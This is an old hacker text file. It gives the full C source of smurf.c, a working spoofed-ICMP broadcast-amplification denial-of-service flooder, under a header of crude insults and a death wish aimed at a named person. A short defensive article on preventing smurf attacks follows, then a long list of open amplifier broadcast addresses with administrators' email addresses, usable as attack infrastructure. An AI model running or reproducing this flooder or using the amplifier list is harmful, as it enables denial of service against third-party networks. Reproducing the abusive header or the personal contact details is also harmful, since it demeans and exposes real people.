* $Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $
*
* spoofs icmp packets from a host to various broadcast addresses resulting in
* multiple replies to that host from a single packet.
*
* orginial linux code by tfreak, most props to him, all I did was port it to
* operating systems with a less perverse networking system, such as FreeBSD,
* and many others. -Griffin
*
* mad head to: nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea
* pig, MissSatan for swallowing, napster for pimping my sister, the guy that
* invented vaseline, fyber for trying, knowy, old school #havok, kain cos he
* rox my sox, zuez, toxik, robocod, and everyone else that i might have
* missed (you know who you are).
*
* hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy thing
* he is (he's -almost- as stubborn as me, still i managed to pick up half
* the cheque).
*
* and a special hi to Todd, face it dude, you're fucking awesome.
*
* mad anal to: #madcrew/#conflict for not cashing in their cluepons, EFnet
* IRCOps because they plain suck, Rolex for being a twit, everyone that
* trades warez, Caren for being a lesbian hoe, AcidKill for being her
* partner, #cha0s, sedriss for having an ego in inverse proportion to his
* penis and anyone that can't pee standing up -- you don't know what your
* missing out on.
*
* and anyone thats ripped my code (diff smurf.c axcast.c is rather
* interesting).
*
* and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill Robbins
* for trying to steal my girlfriend. Not only did you show me no respect
* but you're a manipulating prick who tried to take away the most important
* thing in the world to me with no guilt whatsoever, and for that I wish you
* nothing but pain. Die.
*
* disclaimer: I cannot and will not be held responsible nor legally bound for
* the malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine. This
* is for educational use only. Please Don't abuse this.
*
* Well, i really, really, hate this code, but yet here I am creating another
* disgusting version of it. Odd, indeed. So why did I write it? Well, I,
* like most programmers don't like seeing bugs in their code. I saw a few
* things that should have been done better or needed fixing so I fixed them.
* -shrug-, programming for me as always seemed to take the pain away ...
*
*
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned int host2ip(char *hostname);
unsigned short in_chksum(u_short *, int);
unsigned int
host2ip(char *hostname)
{
static struct in_addr i;
struct hostent *h;
i.s_addr = inet_addr(hostname);
if (i.s_addr == -1) {
h = gethostbyname(hostname);
if (h == NULL) {
fprintf(stderr, "can't find %s\n.", hostname);
exit(0);
}
bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
}
return i.s_addr;
}
/* stamp */
char id[] = "$Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $";
int
main(int argc, char *argv[])
{
struct sockaddr_in sin;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0,
x;
char buf[32], **bcastaddr = malloc(8192);
banner();
signal(SIGINT, ctrlc);
if (argc < 6)
usage(argv[0]);
sin.sin_addr.s_addr = host2ip(argv[1]);
sin.sin_family = AF_INET;
num = atoi(argv[3]);
delay = atoi(argv[4]);
pktsize = atoi(argv[5]);
if ((bcastfile = fopen(argv[2], "r")) == NULL) {
perror("opening bcast file");
exit(-1);
}
x = 0;
while (!feof(bcastfile)) {
fgets(buf, 32, bcastfile);
if (buf[0] == '#' || buf[0] == '\n' || !isdigit(buf[0]))
continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n')
buf[i] = '\0';
bcastaddr[x] = malloc(32);
strcpy(bcastaddr[x], buf);
x++;
}
bcastaddr[x] = 0x0;
fclose(bcastfile);
if (x == 0) {
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
exit(-1);
}
if (pktsize > 1024) {
fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
exit(-1);
}
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("getting socket");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *) &bcast, sizeof(bcast));
printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
for (i = 0; i < num || !num; i++) {
if (!(i % 25)) {
printf(".");
fflush(stdout);
}
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
cycle++;
if (bcastaddr[cycle] == 0x0)
cycle = 0;
usleep(delay);
}
puts("\n\n");
return 0;
}
void
banner(void)
{
puts("\nsmurf.c v5.0 by TFreak, ported by Griffin\n");
}
void
usage(char *prog)
{
fprintf(stderr, "usage: %s <target> <bcast file> "
"<num packets> <packet delay> <packet size>\n\n"
"target = address to hit\n"
"bcast file = file to read broadcast addresses from\n"
"num packets = number of packets to send (0 = flood)\n"
"packet delay = wait between each packet (in ms)\n"
"packet size = size of packet (< 1024)\n\n", prog);
exit(-1);
}
void
smurf(int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct ip *ip;
struct icmp *icmp;
char *packet;
int hincl = 1;
packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + psize);
ip = (struct ip *) packet;
icmp = (struct icmp *) (packet + sizeof(struct ip));
memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + psize);
setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl));
ip->ip_len = sizeof(struct ip) + sizeof(struct icmp) + psize;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_v = 4;
ip->ip_ttl = 255;
ip->ip_tos = 0;
ip->ip_off = 0;
ip->ip_id = htons(getpid());
ip->ip_p = 1;
ip->ip_src.s_addr = sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dest;
ip->ip_sum = 0;
icmp->icmp_type = 8;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + psize,
0, (struct sockaddr *) & sin, sizeof(struct sockaddr));
free(packet); /* free willy! */
}
void
ctrlc(int ignored)
{
puts("\nDone!\n");
exit(1);
}
unsigned short
in_chksum(u_short * addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
--- end ---
Preventing Smurf Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.nordu.net/articles/smurf.html
Introduction
This brief introduction to the denial-of-service attacks of the SMURF type (named after the program used to instigate the attack) explains what they
are and what can be done about them.
In a SMURF attack you can be affected in one of several ways:
As a victim or target of the attack
As a network which is abused to amplify the attack
As a party harboring the instigator of the attack
SMURF and similar Denial-of-service (DoS) attacks can do serious damage to your network services, be it either as an individual end-user or as
an entire institution in that your network or host can be inundated with unwanted and maliciously sent traffic.
Anatomy of a SMURF Attack
A SMURF attack (named after the program used to perform the attack) is a method by which an attacker can send a moderate amount of traffic
and cause a virtual explosion of traffic at the intended target. The method used is as follows:
The attacker sends ICMP Echo Request packets where the source IP address has been forged to be that of the target of the attack.
The attacker sends these ICMP datagrams to addresses of remote LANs broadcast addresses, using so-called directed broadcast
addresses. These datagrams are thus broadcast out on the LANs by the connected router.
All the hosts which are �alive� on the LAN each pick up a copy of the ICMP Echo Request datagram (as they should), and sends an ICMP
Echo Reply datagram back to what they think is the source. If many hosts are �alive� on the LAN, the amplification factor can be
considerably (100+ is not uncommon).
The attacker can use largish packets (typically up to ethernet maximum) to increase the �effectiveness� of the attack, and the faster network
connection the attacker has, the more damage he can inflict on the target and the target's network.
Not only can the attacker cause problems for the target host, the influx of traffic can in fact be so great as to have a seriously negative effect on the
upstream network(s) from the target. In fact, those institutions being abused as amplifier networks can also be similarly affected, in that their
network connection can be swamped by the Echo Reply packets destined for the target.
Preventing SMURF attacks
PROPERLY CONFIGURED NETWORK EQUIPMENT IS THE KEY
The availability of the directed broadcast function is an important element in these attacks. The current Proposed Standard for "Requirements for
IP Version 4 Routers" (RFC1812) states that a router must default to forwarding directed broadcasts, that a knob must exist to turn it off, but it
must default to the �on� position (see section 5.3.5.2 of RFC1812). However, the current sentiment is that this should no longer be a requirement.
Thus, to prevent your network from being abused as an amplifier network in a SMURF attack, you should turn off the forwarding of directed
broadcast on all router ports or take other measures to assure your network cannot be abused in this manner.
Another component which is important in this type of attack is that the attacker has to be able to inject packets into the network with forged IP
source addresses. It is possible to enable functions in routers which will prevent the trivial forgery of IP source addresses, and doing so for a local
network will prevent SMURF attacks from being launched locally. (Do however note that access lists can have a performance impact, so judicious
use of such tools is advised.) This sort of ingress filtering has been documented in RFC2267, and is effective not only for preventing local
origination of SMURF attacks, and also makes tracking attacks (or denying origination of attacks) much easier.
Since SMURF attacks use forged source addresses, tracking SMURF attacks back to their source can be a challenge. It has to be done while the
attack is ongoing, and requires the swift cooperation of all the network service providers along the path. In practice this has proven to be quite
difficult. Instead, what we have done in NORDUnet is to set a rate-limit on the volume of ICMP Echo Reply traffic we allow into NORDUnet. This
is so that we can �soften� the effect of an attack originated outside of NORDUnet directed at a host inside NORDUnet.
For more detailed instructions as to how to take precautionary measures see Craig A. Huegen's page describing SMURF attacks. There is also an
informal SMURF Amplifier Registry housed by the norwegian ISP PowerTech, which in the form of a �hall of shame� lists active amplifier
networks. It might be a good idea to check that your network is not on this list.
http://netscan.org/lamers-r-us.html - Lists the current 2048 top smurf amplifiers, sample list below
And the following information:
Current top ten smurf amplifiers (updated every 5 minutes)
(last update: 1999-08-04 20:31:03 CET)
Network #Dups #Incidents Registered at Home AS
208.248.240.0/24 123 0 1999-07-31 22:49 not-analyzed
208.239.162.0/24 97 0 1999-07-28 00:15 not-analyzed
208.6.8.0/24 93 0 1999-07-28 00:34 not-analyzed
208.166.201.0/24 89 0 1999-01-19 07:13 AS4181
4.5.255.0/24 79 0 1999-07-14 12:35 not-analyzed
204.96.225.0/24 73 0 1998-06-22 17:46 AS3594
192.0.0.0/2 73 0 1999-01-04 06:39 not-analyzed
128.0.0.0/1 73 0 1999-01-28 02:36 not-analyzed
209.0.233.0/24 73 0 1999-04-28 23:45 AS3356
194.170.181.0/24 72 0 1998-10-24 09:42 AS5384
110536 networks have been probed with the SAR
19684 of them are currently broken
13338 have been fixed after being listed here
comes from a Norwegian site, http://www.powertech.no/smurf/
Smurf Amplifier List (Is your network on this list??)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://netscan.org/lamers-r-us.html
Note that it's also possible to see the # of replies for any network. Head to the main page and
punch in an IP.
Last rescan: Wed Jul 14 20:00:57 EDT 1999
RESP ADDR EMAIL ADDRESSES
---------------------------------------------------------------------
141239 24.48.37.255 hostmaster@adelphia.net
47509 24.131.12.255 help@mediaone.net
10525 208.213.139.255 nick@sunbrokerage.com
2991 209.112.24.255 mike@sentex.net
805 192.114.6.0 hank@isoc.org.il
728 194.235.65.0 coen@microhill.nl, jasper@webcity.nl
690 194.235.65.255 coen@microhill.nl, jasper@webcity.nl
610 192.114.6.255 hank@isoc.org.il
610 194.254.164.255 florence@upn.univ-paris13.fr
492 209.51.241.255 dhoyt@hoyt.com
476 206.228.251.255 tarvid@ls.net
457 203.17.162.255 hostmaster@telstra.net
453 199.57.108.0 HOSTMASTER@nic.mil
400 24.48.8.255 hostmaster@adelphia.net
391 24.48.10.255 hostmaster@adelphia.net
387 199.57.108.255 HOSTMASTER@nic.mil
366 208.243.102.255 dave@mva.net
351 204.117.176.255 colin.dykstra@solect.com
328 209.51.241.0 dhoyt@hoyt.com
316 209.3.78.255 noc@iconnet.net
298 208.167.166.255 robert@madole.org
286 210.62.19.255 pywang@ignmail.gcn.net.tw, eric1107@gcn.net.tw
248 207.171.247.255 domain@slip.net
248 208.200.208.255 nomailbox@nowhere
245 208.0.173.0 georges@abbasys.com
244 216.96.82.0 dw498h20@lx.netcom.com
244 210.230.65.0 hostmaster@nic.ad.jp
243 24.48.14.255 hostmaster@adelphia.net
242 210.230.69.255 hostmaster@nic.ad.jp
235 203.17.162.0 hostmaster@telstra.net
234 192.115.90.0 hank@isoc.org.il
234 210.164.32.0 hostmaster@nic.ad.jp
234 206.228.251.0 tarvid@ls.net
212 204.117.176.0 colin.dykstra@solect.com
211 194.52.151.255 leifl@etforlag.se
211 209.20.39.255 netadmin@interlog.net
208 206.55.18.0 nic@monumental.com
207 194.52.151.0 leifl@etforlag.se
203 192.115.90.255 hank@isoc.org.il
198 208.167.166.0 robert@madole.org
193 208.32.150.255 DONL@webventures.com
188 207.138.177.0 snvnoc@globalcenter.net
186 216.28.108.255 tstroup@fnsi.net
174 209.83.78.255 admin@norlight.net
171 206.55.18.255 nic@monumental.com
171 207.138.177.255 snvnoc@globalcenter.net
169 206.0.150.255 hostinfo@psi.com
164 209.110.66.0 Louis_Lee@icgcomm.com
161 192.107.99.0 bardotti@frascati.enea.it
154 24.129.52.255 help@mediaone.net
154 199.251.99.0 lind@forum.saic.com
142 209.83.78.0 admin@norlight.net
139 206.175.50.0 tech@netwalk.com
137 208.32.150.0 DONL@webventures.com
134 209.110.66.255 Louis_Lee@icgcomm.com
133 206.215.156.0 wbm@travelx.com
133 206.215.156.255 wbm@travelx.com
125 199.250.180.255 dnstech@eni.net
125 208.248.240.255 nomailbox@nowhere
125 216.26.26.0 hostmaster@teleport.com
125 216.26.26.255 hostmaster@teleport.com
124 209.212.162.255 hostmaster@rhythms.net
124 208.219.170.255 help@uunet.uu.net
124 208.236.130.255 mckee@admin.infoave.net
124 208.29.221.255 scott@thrifty.net
123 194.159.37.255 postmaster@infosys.co.uk
123 206.114.7.255 ovanegas@dns1.americatel.net.co
123 208.195.250.255 nomailbox@nowhere
123 209.84.88.255 ipadmin@gte.net
123 208.170.100.255 mderrick@hiwaay.net
123 208.0.173.255 georges@abbasys.com
122 147.229.67.255 slama@cis.vutbr.cs
122 198.243.122.255 bgardner@qwest.net
122 202.96.106.255 dmkou@publicf.bta.net.cn
122 204.214.111.255 tim@harborside.com
122 207.202.127.255 noc@corp.idt.net
122 207.241.14.255 info@cbcast.com
122 208.237.81.255 sitemaster@exploremaine.com
122 208.199.248.255 nomailbox@nowhere
122 209.46.15.255 hostmaster@gofast.net
121 198.243.54.0 sid@meph.soma.com
121 202.102.138.255 dmkou@publicf.bta.net.cn, zxf@pub.sd.cninfo.net
121 205.200.232.255 patrick@escape.ca
121 207.175.201.255 ipadmin@gte.net
121 210.169.80.0 hostmaster@nic.ad.jp
121 216.46.204.255 hostmaster@pathwaynet.com
120 194.2.21.255 jmp@oleane.net, rol@oleane.net
120 195.184.38.255 hein@euroconnect.net
120 195.242.60.255 sussie@mbox302.swipnet.se,
vincent.mejlak@swipnet.se
120 195.8.107.255 loco@globalcenter.net
120 202.98.5.255 dmkou@publicf.bta.net.cn, yzxu@publicf.bta.net.cn
120 204.251.48.255 NOC@sprint.net
119 24.129.31.255 help@mediaone.net
119 199.170.203.255 jfarmer@goldsword.com
119 202.103.6.255 dmkou@publicf.bta.net.cn, dx@hbdcb.net.cn
119 204.171.186.0 sysop@dp.net
119 216.16.22.255 sysadmin@dtg.com
118 195.224.162.0 nic@gxn.net, j_davis@wandsworth.gov.uk
118 199.94.214.255 ops@bbnplanet.com
118 202.208.82.255 technical@apnic.net
118 210.132.164.255 hostmaster@nic.ad.jp
117 210.164.32.255 hostmaster@nic.ad.jp
115 194.27.141.255
115 207.235.88.255 rickyc@world-net.net
114 62.156.149.0 egerding@04.dssd2.telekom400.dbp.de,
udo.altmann@telekom.de
114 194.121.100.255 softinfo@softline.de, kf@ilk.de
113 199.78.32.0 nomailbox@nowhere
111 199.78.32.255 nomailbox@nowhere
108 206.104.113.255 nomailbox@nowhere
108 209.115.108.255 tstroup@fnsi.net
105 216.69.2.255 jrapier@mail.state.ky.us
102 210.118.83.0 mgr@samsung.co.kr, ip@samsung.co.kr
101 209.3.168.255
98 208.138.60.0 txa@source.net
98 208.138.60.255 txa@source.net
98 208.167.167.0 robert@madole.org
96 204.96.179.255 dnsadmin@sig.net
96 208.155.35.255 andy@mtco.com
95 204.96.179.0 dnsadmin@sig.net
95 207.108.124.0 dns-info@uswest.net
93 204.179.196.0 postmaster@chomp.com
91 208.161.128.255 tmalone@kalliance.com
90 63.66.121.255 billk@silverplatter.com
89 207.108.124.255 dns-info@uswest.net
88 207.193.253.0 hostmaster@swbell.net
88 207.193.253.255 hostmaster@swbell.net
86 198.188.162.0 nes@4c.net
86 208.239.162.255 nomailbox@nowhere
86 208.157.193.255 Jamie@wcitx.com
85 203.93.41.255
85 210.118.83.255 mgr@samsung.co.kr, ip@samsung.co.kr
84 208.239.162.0 nomailbox@nowhere
82 63.66.121.0 billk@silverplatter.com
82 199.251.99.255 lind@forum.saic.com
82 204.97.93.0 sbriggs@i-2000.com
82 204.97.93.255 sbriggs@i-2000.com
82 206.101.244.255 nomailbox@nowhere
82 206.127.232.255 gmosier@pixi.com
82 206.127.239.255 gmosier@pixi.com
82 208.228.42.0 bkressman@netexplorer.com
82 208.228.42.255 bkressman@netexplorer.com
81 199.227.202.255 netadm@gate.net
81 209.232.130.255 ip-admin@pbi.net
80 202.96.108.255 dmkou@publicf.bta.net.cn
77 216.111.249.255 RTHEIGE@adforce.com
77 208.129.11.255 sundog@coop.crn.org
76 159.66.142.0 robertb@coop.com
76 202.230.181.255 hostmaster@nic.ad.jp
76 204.243.120.255 hostinfo@psi.com
76 206.141.74.255 lak@aads.net
75 212.213.47.0 Tapani.Heinonen@Sonera.fi,
Valtteri.Karu@Sonera.fi
75 208.6.8.0 admin@penn.com
75 208.6.8.255 admin@penn.com
74 216.111.248.0 RTHEIGE@adforce.com
74 206.5.130.255 hostinfo@psi.com
72 159.66.148.0 robertb@coop.com
72 159.66.148.255 robertb@coop.com
72 194.225.3.255 pourpak@irearn.bitnet, nowzari@ipm.ac.ir,
nowzari@irearn.bitnet, parsaei@irearn.bitnet,
sarrami@ece.ut.ac.ir, ahrabian@irearn.bitnet
72 199.227.200.255 netadm@gate.net
72 212.213.44.255 Tapani.Heinonen@Sonera.fi,
Valtteri.Karu@Sonera.fi
71 159.66.144.255 robertb@coop.com
71 159.66.158.0 robertb@coop.com
71 212.213.47.255 Tapani.Heinonen@Sonera.fi,
Valtteri.Karu@Sonera.fi
71 209.0.233.0 ipadmin@level3.net
70 195.224.243.255 nic@gxn.net, asm@gxn.net
70 210.75.128.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
70 210.75.128.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
69 159.66.147.255 robertb@coop.com
69 206.141.74.0 lak@aads.net
69 209.38.146.255 dnsadmin@rmi.net
68 206.217.87.255 power@tool.net
67 195.224.242.0 nic@gxn.net, asm@gxn.net
67 212.213.44.0 Tapani.Heinonen@Sonera.fi,
Valtteri.Karu@Sonera.fi
67 206.43.93.255 muzdzign@cnct.com
66 204.179.196.255 postmaster@chomp.com
65 210.131.77.0 hostmaster@nic.ad.jp
64 159.66.145.0 robertb@coop.com
63 192.50.75.0 matsui@etl.go.jp
63 209.234.209.0 jkerrey@gstworld.net
62 209.233.219.0 ip-admin@pbi.net
61 204.71.242.0 smantel@pathfinder.com
61 204.71.242.255 smantel@pathfinder.com
60 207.152.126.0 Postmaster@popmail.jba.com
60 207.152.126.255 Postmaster@popmail.jba.com
60 210.84.0.255 net-ops@list.ozemail.com.au
59 205.187.155.0 root@fontana.k12.ca.us
59 208.149.229.255 timls@srttel.com
58 193.13.151.0
58 204.217.194.0 hostinfo@psi.com
58 205.253.196.255 karl@mcs.com
58 206.217.87.0 power@tool.net
58 207.123.253.0 mullauer@umms-itg.ab.umd.edu
58 207.215.237.0 dennis@globalpac.com
57 193.13.151.255
57 195.156.92.0 janne.tiuttu@cimcorp.fi, paavo.ranta@cimcorp.fi
57 209.254.66.0 netadmin@splitrock.net
57 209.252.154.0 netadmin@splitrock.net
57 209.254.66.255 netadmin@splitrock.net
57 209.252.155.255 netadmin@splitrock.net
57 209.253.94.0 netadmin@splitrock.net
57 209.253.240.0 netadmin@splitrock.net
57 209.252.151.0 netadmin@splitrock.net
57 209.253.243.255 netadmin@splitrock.net
57 209.253.95.255 netadmin@splitrock.net
57 209.252.151.255 netadmin@splitrock.net
56 134.241.250.0 hostmaster@umassp.edu
56 199.178.64.0 hostmaster@ameritech.net
56 204.217.194.255 hostinfo@psi.com
56 216.102.167.0 ip-admin@pbi.net
56 206.66.243.0 daniel@webdimensions.com
56 206.5.130.0 hostinfo@psi.com
56 206.231.65.255 NOC@sprint.net
55 198.188.168.0 nes@4c.net
55 204.253.190.0 direwolf@shout.net
55 204.253.190.255 direwolf@shout.net
55 207.213.205.255 andy@ssw1.com
55 216.20.92.0 jcoco@mec.edu
54 194.225.3.0 nowzari@ipm.ac.ir, sarrami@ece.ut.ac.ir
54 198.129.74.255 hostmaster@es.net
54 199.227.200.0 netadm@gate.net
54 205.138.94.255
54 207.123.252.0 mullauer@umms-itg.ab.umd.edu
54 209.73.88.255 hostmaster@digilink.net
53 167.199.95.0 jda51@state.ga.us
53 192.104.183.0 gower@howpubs.com
53 193.15.102.0
53 193.15.102.255
53 194.167.0.0 sygnet@iap.fr, grenet@iap.fr
53 195.156.126.0
53 204.222.10.255
53 204.222.11.0
53 204.96.225.255 marcy@rain.org
52 199.238.157.0 hostmaster@arin.net
52 209.61.8.255 fredl@tiac.net
51 140.249.40.255 jjackson@wpine.com
51 159.66.144.0 robertb@coop.com
51 161.223.41.0
51 161.223.41.255
51 203.238.128.255 mgr@nownuri.net, ip@nownuri.net
51 204.96.225.0 marcy@rain.org
51 205.171.32.0 hostmaster@csn.net
50 195.145.123.0 lick@ron.de
50 198.129.74.0 hostmaster@es.net
50 198.97.78.255 postmaster@algo.net
50 207.123.252.255 mullauer@umms-itg.ab.umd.edu
50 209.251.172.0 mczakaria@chartercom.com
50 209.251.172.255 mczakaria@chartercom.com
49 152.12.1.255 tallen@ramsun.acc.wssu.edu
49 192.104.183.255 gower@howpubs.com
49 193.91.202.0
49 195.182.162.255 r.jamieson@dccl.net, y.cheung@dccl.net,
c.heald@dccl.net
49 198.64.22.255 hostmaster@sesqui.net
49 207.132.232.0 HOSTMASTER@nic.mil
49 207.115.60.255 harrycw@prodigy.net
49 208.146.145.255 brennick@wharvest.com
49 209.175.160.0 wdahlen@mail.isbe.state.il.us
49 209.27.160.255 hostmaster@idci.net
48 140.249.40.0 jjackson@wpine.com
48 143.213.130.255 MILLARDD@shafter-emh3.army.mil
48 161.223.42.0
48 204.152.57.0 allen.arthur@oak.doe.gov
48 204.222.10.0
48 206.162.52.255 admin@dx.net
48 207.90.230.255 dnsmaster@infohwy.com
48 216.64.151.255 hostmaster@gsti.net
48 209.175.160.255 wdahlen@mail.isbe.state.il.us
48 208.155.35.0 andy@mtco.com
48 209.73.236.255 hostmaster@pfmc.net
48 209.27.160.0 hostmaster@idci.net
47 140.239.57.255 hostmaster@harvard.net
47 143.213.200.255 MILLARDD@shafter-emh3.army.mil
47 195.81.0.0 jan@ixe.net, arno@ixe.net
47 205.187.155.255 root@fontana.k12.ca.us
47 216.111.166.0 noc@qwest.net
47 216.50.108.0 technical@kivex.com
47 208.146.145.0 brennick@wharvest.com
47 209.175.161.0 wdahlen@mail.isbe.state.il.us
46 161.223.42.255
46 203.238.128.0 mgr@nownuri.net, ip@nownuri.net
46 206.129.187.0 dns-admin@ixa.net
46 207.121.206.255 rtharp@gcts.edu
46 209.145.131.255 noc@accessus.net
46 209.208.248.0 hostmaster@pfmc.net
46 209.87.67.255 services@virtualpro.com
45 192.116.146.0 hank@isoc.org.il
45 192.70.104.255 Annie.Renard@inria.fr
45 194.140.169.255 ramon.recio@tecsidel.es, jordiar@cinet.es
45 194.140.170.255 ramon.recio@tecsidel.es
45 198.64.21.0 hostmaster@sesqui.net
45 204.228.78.0 cgarner@sni.net
45 206.129.141.0 nikm@cyberflunk.com
45 206.129.141.255 nikm@cyberflunk.com
45 206.170.59.255 dnsadmin@pbi.net
45 210.131.76.0 hostmaster@nic.ad.jp
45 207.203.95.0 ipadmin@bellsouth.net
45 207.215.237.255 dennis@globalpac.com
45 209.145.131.0 noc@accessus.net
45 206.75.155.255 swip@istar.ca
45 209.98.40.255 drechsau@geeks.org
45 210.94.51.0 wkim@nca.or.kr, syha@rs.krnic.net,
yuppie@nic.or.kr
45 210.94.51.255 wkim@nca.or.kr, syha@rs.krnic.net,
yuppie@nic.or.kr
44 202.251.136.255 hostmaster@nic.ad.jp
44 204.27.91.0 n@nectar.com
44 204.84.29.255 hostmaster@ncren.net
44 205.147.142.0 noc@corp.idt.net
44 205.147.142.255 noc@corp.idt.net
44 205.164.166.255 mjg@writeme.com
44 205.185.157.0 Louis_Lee@icgcomm.com
44 205.185.157.255 Louis_Lee@icgcomm.com
44 205.198.253.0 markg@hkusa.com
44 206.141.16.0 lak@aads.net
44 206.148.55.0 dnr@spacelab.net
44 206.155.91.0 admin@lisco.com
44 207.244.127.0 ljg@shore.net
44 207.244.127.255 ljg@shore.net
44 216.98.157.0 ray_25@yahoo.com
44 206.75.155.0 swip@istar.ca
43 148.83.7.255
43 152.30.20.0 mckenzie@wcuvax1.wcu.edu
43 152.30.20.255 mckenzie@wcuvax1.wcu.edu
43 194.16.2.0 stefan@netch.se
43 198.64.44.0 hostmaster@sesqui.net
43 200.129.158.0 gomide@nic.br
43 204.254.80.0 keith@dcna.com
43 209.208.227.0 hostmaster@pfmc.net
43 207.121.206.0 rtharp@gcts.edu
43 209.3.130.0 wkrug@atlnet.org
42 194.148.1.0 afink@pingnet.ch
42 200.129.158.255 gomide@nic.br
42 202.78.157.255 ken@clearview.co.nz, bobg@clearview.co.nz
42 204.130.68.0
42 204.130.68.255
42 204.57.162.0 chrismur@overlake.org
42 204.57.162.255 chrismur@overlake.org
42 204.84.31.0 hostmaster@ncren.net
42 207.213.205.0 andy@ssw1.com
42 207.203.95.255 ipadmin@bellsouth.net
42 207.123.250.0 mullauer@umms-itg.ab.umd.edu
42 207.90.230.0 dnsmaster@infohwy.com
42 206.66.243.255 daniel@webdimensions.com
42 208.192.231.255 noc@interactive.net
42 216.51.59.255 technical@kivex.com
41 63.66.135.255 nobody@uu.net
41 192.207.9.255 tom@server1.angus.com
41 193.91.202.255
41 198.211.230.0 shaver@healthcare.com
41 199.94.18.0 newhall@noc.harvard.edu
41 199.94.18.255 newhall@noc.harvard.edu
41 200.46.63.255 admin@sinfo.net
41 204.168.184.0 bill.russell@nyu.edu
41 204.27.91.255 n@nectar.com
41 204.84.30.255 hostmaster@ncren.net
41 204.97.19.0 hostmaster@top.monad.net
41 205.247.10.255 sbriggs@i-2000.com
41 206.233.90.255 hostinfo@psi.com
41 210.165.39.255 hostmaster@nic.ad.jp
41 206.231.62.0 hagen@meol.mass.edu
41 206.231.62.255 hagen@meol.mass.edu
41 208.236.180.0 martyr@acr.org
41 208.192.231.0 noc@interactive.net
40 143.43.204.0 D-Romano@wiu.edu
40 143.43.205.255 D-Romano@wiu.edu
40 192.239.137.0 pete@rayleigh.tt.aftac.gov
40 192.239.137.255 pete@rayleigh.tt.aftac.gov
40 194.167.120.0 yves.prague@u-bordeaux2.fr
40 195.18.119.0 marcel@nl.gxn.net, stefan@nl.gxn.net,
hans@nl.gxn.net
40 195.18.119.255 marcel@nl.gxn.net, stefan@nl.gxn.net,
hans@nl.gxn.net
40 199.108.184.0 dns@cerf.net
40 200.20.94.0 gomide@nic.br
40 204.84.30.0 hostmaster@ncren.net
40 204.84.31.255 hostmaster@ncren.net
40 205.213.128.255 frcr@ltc.tec.wi.us
40 205.213.133.255 frcr@ltc.tec.wi.us
40 206.148.251.0 noc@mwci.net
40 206.148.251.255 noc@mwci.net
40 206.157.67.255 abettsak@sinfo.net
40 206.157.68.0 abettsak@sinfo.net
40 209.64.2.255 info@netradio.net
40 206.27.80.0 abettsak@sinfo.net
40 208.140.202.255 admin@sinfo.net
40 209.137.126.0 hostmaster@icix.net
40 207.49.79.0 abettsak@sinfo.net
39 148.83.4.0
39 194.8.193.0 mruesel@netcologne.de, akb@netcologne.de,
jsommerberg@netcologne.de
39 195.145.123.255 lick@ron.de
39 200.17.53.0 gomide@nic.br
39 203.139.106.255 hostmaster@nic.ad.jp
39 203.179.212.255 hostmaster@nic.ad.jp
39 204.179.253.0 dpinder@appliedcom.com
39 204.179.253.255 dpinder@appliedcom.com
39 204.84.29.0 hostmaster@ncren.net
39 204.88.64.0
39 204.97.19.255 hostmaster@top.monad.net
39 205.221.193.0 rparis@ihcc.cc.ia.us
39 206.157.64.0 abettsak@sinfo.net
39 209.133.61.255 noc@above.net
39 208.237.105.0 rwilhe@luk-us.com
39 208.152.187.0 stokes@aris.net
39 208.152.187.255 stokes@aris.net
39 208.3.167.255 nomailbox@nowhere
39 208.201.184.0 nomailbox@nowhere
38 63.64.107.0 jshelnutt@ispalliance.net
38 63.64.107.255 jshelnutt@ispalliance.net
38 192.239.136.0 pete@rayleigh.tt.aftac.gov
38 192.239.136.255 pete@rayleigh.tt.aftac.gov
38 193.128.20.0
38 193.128.21.0
38 193.128.21.255
38 193.6.21.255 net-admin@sztaki.hu, dns-admin@hungarnet.hu
38 198.64.21.255 hostmaster@sesqui.net
38 198.64.22.0 hostmaster@sesqui.net
38 199.244.182.0
38 200.16.176.0 nomailbox@nowhere
38 202.251.136.0 hostmaster@nic.ad.jp
38 204.116.225.0
38 204.116.225.255
